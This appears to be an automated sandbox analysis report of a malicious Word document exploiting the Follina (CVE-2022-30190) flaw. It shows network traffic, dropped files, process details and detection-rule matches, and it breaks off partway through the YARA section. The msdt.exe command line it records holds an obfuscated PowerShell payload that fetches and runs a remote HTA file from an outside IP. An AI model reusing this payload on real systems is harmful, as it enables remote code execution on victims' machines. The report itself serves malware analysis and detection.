Jun 16, 2022 14:20:02.686994076 CEST	49747	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.904742002 CEST	62563	49747	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.905064106 CEST	62563	49747	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.905086994 CEST	62563	49747	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:02.905184031 CEST	49747	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:02.905255079 CEST	49747	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:03.126285076 CEST	62563	49747	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:05.961309910 CEST	49748	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.190330029 CEST	62563	49748	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.190459013 CEST	49748	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.190567017 CEST	49748	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.418637991 CEST	62563	49748	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.419333935 CEST	62563	49748	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.419361115 CEST	62563	49748	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.419506073 CEST	49748	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.420177937 CEST	49748	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.522555113 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.750639915 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.750817060 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.751089096 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.981957912 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982336998 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982383966 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982436895 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982460022 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.982486963 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982521057 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.982546091 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982549906 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.982584953 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:06.982610941 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.982651949 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:06.984752893 CEST	49749	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.168987036 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.209604979 CEST	62563	49749	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.395502090 CEST	62563	49750	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.395735025 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.395937920 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.626498938 CEST	62563	49750	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.629883051 CEST	62563	49750	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.629930973 CEST	62563	49750	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.630073071 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.630156040 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.630160093 CEST	49750	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:07.852909088 CEST	62563	49750	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:07.871310949 CEST	49751	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.107610941 CEST	62563	49751	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.107745886 CEST	49751	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.133632898 CEST	49751	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.362663984 CEST	62563	49751	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.362894058 CEST	62563	49751	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.362912893 CEST	62563	49751	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.363102913 CEST	49751	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.365233898 CEST	49751	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.406281948 CEST	49752	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.596543074 CEST	62563	49751	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.642559052 CEST	62563	49752	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.642770052 CEST	49752	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.643004894 CEST	49752	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.870064974 CEST	62563	49752	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.870100975 CEST	62563	49752	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.870124102 CEST	62563	49752	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:08.870325089 CEST	49752	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.870409966 CEST	49752	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:08.904798985 CEST	49753	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.125413895 CEST	62563	49753	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.125642061 CEST	49753	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.125781059 CEST	49753	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.343839884 CEST	62563	49753	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.344546080 CEST	62563	49753	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.344568968 CEST	62563	49753	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.344683886 CEST	49753	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.345591068 CEST	49753	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.364561081 CEST	49754	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.565346956 CEST	62563	49753	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.595829964 CEST	62563	49754	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.595948935 CEST	49754	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.596090078 CEST	49754	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.820771933 CEST	62563	49754	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.821291924 CEST	62563	49754	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.821315050 CEST	62563	49754	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:09.821413994 CEST	49754	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.821537971 CEST	49754	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:09.832215071 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.060343027 CEST	62563	49755	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.060432911 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.060765028 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.292787075 CEST	62563	49755	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.292975903 CEST	62563	49755	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.293080091 CEST	62563	49755	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.293131113 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.295248985 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.339620113 CEST	49755	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.346128941 CEST	49756	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.567341089 CEST	62563	49755	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.567751884 CEST	62563	49756	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.567930937 CEST	49756	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.625039101 CEST	49756	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.852756023 CEST	62563	49756	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.853050947 CEST	62563	49756	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.853066921 CEST	62563	49756	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:10.853173971 CEST	49756	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:10.853267908 CEST	49756	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:11.083395958 CEST	62563	49756	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:11.173162937 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:11.398674965 CEST	62563	49757	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:11.398869991 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:11.883615017 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:12.108988047 CEST	62563	49757	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:12.109253883 CEST	62563	49757	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:12.109272957 CEST	62563	49757	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:12.109360933 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:12.109405041 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:12.109456062 CEST	49757	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:12.335897923 CEST	62563	49757	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:19.573633909 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:19.799110889 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:19.799297094 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:19.800246954 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:20.026499987 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:20.026706934 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:20.026738882 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:20.026778936 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:20.026817083 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:20.026829004 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:20:20.253750086 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:20.253782988 CEST	62563	49758	101.33.231.81	192.168.2.3
Jun 16, 2022 14:20:20.253880978 CEST	49758	62563	192.168.2.3	101.33.231.81
Jun 16, 2022 14:21:44.083216906 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.313682079 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.315840006 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.362382889 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.601610899 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602528095 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602585077 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602626085 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602655888 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602667093 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602699041 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602705002 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602710009 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602710009 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602752924 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602766037 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602792025 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602804899 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602833986 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602849007 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602880001 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602890015 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602920055 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.602930069 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.602971077 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.832551003 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832611084 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832649946 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832689047 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832731009 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832781076 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832818985 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832859039 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.832866907 CEST	61256	49781	159.75.135.162	192.168.2.3
Jun 16, 2022 14:21:44.832915068 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.832926035 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:44.857872009 CEST	49781	61256	192.168.2.3	159.75.135.162
Jun 16, 2022 14:21:45.088077068 CEST	61256	49781	159.75.135.162	192.168.2.3

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:02.135394096 CEST	1293	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:02.359416008 CEST	1293	IN	HTTP/1.0 501 Unsupported method ('OPTIONS') Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:02 GMT Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 500

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:02.686994076 CEST	1294	OUT	HEAD /exploit.html HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:02.905064106 CEST	1295	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:02 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:10.625039101 CEST	1312	OUT	HEAD /exploit.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: 101.33.231.81:62563 Connection: Keep-Alive
Jun 16, 2022 14:20:10.853050947 CEST	1313	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:10 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:11.883615017 CEST	1314	OUT	HEAD /exploit.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: 101.33.231.81:62563 Connection: Keep-Alive
Jun 16, 2022 14:20:12.109253883 CEST	1314	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:11 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:19.800246954 CEST	1315	OUT	HEAD /exploit.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: 101.33.231.81:62563 Connection: Keep-Alive
Jun 16, 2022 14:20:20.026706934 CEST	1315	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:19 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:21:44.362382889 CEST	7317	OUT	GET /dllhost.hta HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 159.75.135.162:61256 Connection: Keep-Alive
Jun 16, 2022 14:21:44.602528095 CEST	7317	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:21:44 GMT Content-type: application/octet-stream Content-Length: 21824 Last-Modified: Mon, 13 Jun 2022 15:06:36 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:06.190567017 CEST	1296	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:06.419333935 CEST	1296	IN	HTTP/1.0 501 Unsupported method ('OPTIONS') Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:06 GMT Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 500

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:06.751089096 CEST	1298	OUT	GET /exploit.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 101.33.231.81:62563 Connection: Keep-Alive
Jun 16, 2022 14:20:06.982336998 CEST	1299	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:06 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:07.395937920 CEST	1305	OUT	HEAD /exploit.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: 101.33.231.81:62563 Connection: Keep-Alive
Jun 16, 2022 14:20:07.629883051 CEST	1306	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:07 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:08.643004894 CEST	1307	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:08.870100975 CEST	1308	IN	HTTP/1.0 501 Unsupported method ('OPTIONS') Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:08 GMT Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 500

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:09.125781059 CEST	1309	OUT	HEAD /exploit.html HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:09.344546080 CEST	1309	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:09 GMT Content-type: text/html Content-Length: 5737 Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:09.596090078 CEST	1310	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: 101.33.231.81:62563
Jun 16, 2022 14:20:09.821291924 CEST	1310	IN	HTTP/1.0 501 Unsupported method ('OPTIONS') Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:09 GMT Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 500

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2022 14:20:10.060765028 CEST	1311	OUT	GET /exploit.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 101.33.231.81:62563 If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737 Connection: Keep-Alive
Jun 16, 2022 14:20:10.292975903 CEST	1312	IN	HTTP/1.0 304 Not Modified Server: SimpleHTTP/0.6 Python/3.9.9 Date: Thu, 16 Jun 2022 12:20:10 GMT

Target ID:	0
Start time:	14:19:55
Start date:	16/06/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xbb0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report V3g2Pfu707.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CF27FA06.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E2151DD9.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9C7F191B-1B19-4530-878D-79768D2CF994}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EBAAA875-CA9E-482D-9FF8-D03B7C8CE152}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm

C:\Users\user\AppData\Local\Temp\RES55EE.tmp

C:\Users\user\AppData\Local\Temp\RES5BB.tmp

C:\Users\user\AppData\Local\Temp\RES5C8A.tmp

Windows Analysis Report
V3g2Pfu707.docx

Target ID:	2
Start time:	14:20:01
Start date:	16/06/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:	0x8d0000
File size:	466688 bytes
MD5 hash:	EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	9
Start time:	14:20:14
Start date:	16/06/2022
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase:	0x1180000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 